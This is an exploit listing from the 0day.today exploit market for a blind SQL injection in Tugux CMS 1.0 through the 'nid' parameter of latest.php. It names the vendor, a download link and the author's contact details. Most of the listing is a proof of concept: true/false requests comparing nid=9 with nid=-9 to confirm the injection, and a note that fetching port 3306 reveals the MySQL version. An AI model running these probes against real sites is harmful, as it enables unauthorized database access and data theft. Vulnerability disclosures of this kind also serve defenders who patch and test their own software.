[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Tugux CMS (nid) BLIND Sql Injection Vulnerability

Author
eidelweiss
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15651
Category
web applications
Date add
19-03-2011
Platform
php
Software:   Tugux CMS
Vendor:     www.tugux.com
Vuln Type:  BLind SQL Injection
Download link:  http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
  
  
References: http://eidelweiss-advisories.blogspot.com/2011/03/tugux-cms-nid-blind-sql-injection.html
  
  
===================================================================
  
    exploit & p0c
  
[!] latest.php?nid=[valid nid]
  
    Example p0c
  
[!] http://server/latest.php?nid=9    <= True
[!] http://server/latest.php?nid=-9   <= False
  
[+] http://server:3306    <= download the file , save and open with c++ or wordpad will show mysql version
  
[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D



#  0day.today [2024-12-24]  #